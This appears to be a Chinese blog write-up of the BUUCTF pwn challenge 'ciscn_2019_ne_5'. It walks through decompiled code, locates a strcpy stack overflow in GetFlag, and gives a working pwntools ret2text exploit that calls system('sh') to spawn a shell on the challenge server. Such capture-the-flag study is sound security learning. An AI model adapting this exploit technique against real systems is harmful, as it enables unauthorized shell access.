ciscn 2019 ne 5
|
645
|
0

236 字
|
6 分钟

ciscn 2019 ne 5

前提

查看文件保护

[*] '/root/pwn/buuctf/ciscn_2019_ne_5/ciscn_2019_ne_5'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

静态分析

主函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // [esp+0h] [ebp-100h]
  char src[4]; // [esp+4h] [ebp-FCh]
  char v5; // [esp+8h] [ebp-F8h]
  char s1[4]; // [esp+84h] [ebp-7Ch]
  char v7; // [esp+88h] [ebp-78h]
  const char *v8; // [esp+E8h] [ebp-18h]
  int *v9; // [esp+ECh] [ebp-14h]
  int *v10; // [esp+F4h] [ebp-Ch]

  v10 = &argc;
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  fflush(stdout);
  *(_DWORD *)s1 = 48;
  memset(&v7, 0, 0x60u);
  *(_DWORD *)src = 48;
  memset(&v5, 0, 0x7Cu);
  puts("Welcome to use LFS.");
  printf("Please input admin password:");
  __isoc99_scanf();
  if ( strcmp(s1, "administrator") )
  {
    puts("Password Error!");
    exit(0);
  }
  puts("Welcome!");
  while ( 1 )
  {
    puts("Input your operation:");
    puts("1.Add a log.");
    puts("2.Display all logs.");
    puts("3.Print all logs.");
    printf("0.Exit\n:");
    v9 = &v3;
    v8 = "%d";
    __isoc99_scanf();
    switch ( v3 )
    {
      case 0:
        exit(0);
        return;
      case 1:
        AddLog(src);
        break;
      case 2:
        Display(src);
        break;
      case 3:
        Print();
        break;
      case 4:
        GetFlag(src);
        break;
      default:
        continue;
    }
  }
}

AddLog函数如下

int AddLog(int a1)
{
  printf("Please input new log info:");
  return __isoc99_scanf("%128s",a1);
}

Display函数如下

int __cdecl Display(char *s)
{
  return puts(s);
}

Print函数如下

int Print()
{
  return system("echo Printing......");
}

GetFlag函数如下

int __cdecl GetFlag(char *src)
{
  char dest[4]; // [esp+0h] [ebp-48h]
  char v3; // [esp+4h] [ebp-44h]

  *(_DWORD *)dest = 48;
  memset(&v3, 0, 0x3Cu);
  strcpy(dest, src);
  return printf("The flag is your log:%s\n", dest);
}

Gadget

ROPgadget --binary ciscn_2019_ne_5 --string "sh\x00" 
Strings information
============================================================
0x080482ea : sh

思路分析

  1. 目前信息:
    • passwordadministrator
    • 存在栈溢出漏洞
    • plt内有system
    • sh字符串
    • No PIE
    • NX 保护开启
  2. 思路:
    • GetFlag函数将拷贝AddLog函数所写入的数据,而__isoc99_scanf并未限制写入长度,由此造成溢出,有systemshret2text即可

exp

from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/ciscn_2019_ne_5/ciscn_2019_ne_5'
io = remote('node4.buuoj.cn', 27766)
# io = process(pwnfile)
elf = ELF(pwnfile)
io.sendline('administrator')
io.sendlineafter('0.Exit\n', '1')
padding = 0x48+4
system_addr = elf.symbols['system']
sh_addr = 0x80482ea
payload = flat(['a'*padding, system_addr, 0xdeadbeef, sh_addr])
io.sendline(payload)
io.sendline('4')
io.interactive()
BuuctfPwnStackOverflow
暂无评论

发送评论 编辑评论 



























































































|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	




颜文字
Emoji
小恐龙
花!
	


									














上一篇
下一篇